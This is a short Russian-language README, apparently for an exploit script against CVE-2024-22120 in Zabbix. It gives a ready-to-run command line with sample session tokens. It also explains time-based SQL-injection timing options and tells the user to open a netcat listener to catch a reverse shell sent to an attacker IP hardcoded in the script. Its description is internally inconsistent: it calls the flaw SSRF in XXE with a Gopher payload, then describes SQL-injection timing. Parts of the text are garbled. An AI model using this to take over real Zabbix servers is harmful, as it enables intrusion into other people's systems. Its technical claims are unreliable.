
Это мой эксплойт для CVE-2024-22120, который включает уязвимость SSRF внутри XXE с Gopher-пейлоадом.
python exploit.py --ip <Zabbix_IP> --sid <LowPrivileged_SID> --hostid <HostID> --phpsessid <PHPSESSID> --false_time <FalseTime> --true_time <TrueTime>
Вы обнаружили сервер Zabbix, работающий по IP 192.168.1.100, и у вас есть доступ к низкопривилегированному пользователю со следующими данными:
sid): d82bf6715e1d3c1f25hostid): 10107phpsessid): a4g7f48d9j3r7h8s9gВы хотите использовать уязвимость удаленного выполнения кода (RCE) с помощью этого скрипта.
python exploit.py --ip 192.168.1.100 --sid d82bf6715e1d3c1f25 --hostid 10107 --phpsessid a4g7f48d9j3r7h8s9g --false_time 1 --true_time 3
--ip 192.168.1.100: IP-адрес сервера Zabbix.--sid d82bf6715e1d3c1f25: ID сессии низкопривилегированного пользователя.--hostid 10107: ID хоста, к которому низкопривилегированный пользователь имеет доступ.--phpsessid a4g7f48d9j3r7h8s9g: PHP ID сессии, используемый для аутентификации запросов.--false_time 1: Время в секундах ожидания в случае неверного предположения при SQL-инъекции (по умолчанию 1 секунда).--true_time 3: Время в секундах ожидания в случае верного предположения при SQL-инъекции (по умолчанию 3 секунды).10.0.46.27:5555 в скрипте).Убедитесь, что ваша машина прослушивает указанный порт (5555 в скрипте) для перехвата reverse shell. Вы можете использовать netcat для этого:
nc -lvnp 5555
Замените IP 10.0.46.27 и порт 5555 в функции CreateScript на ваш собственный IP и желаемый порт для получения reverse shell.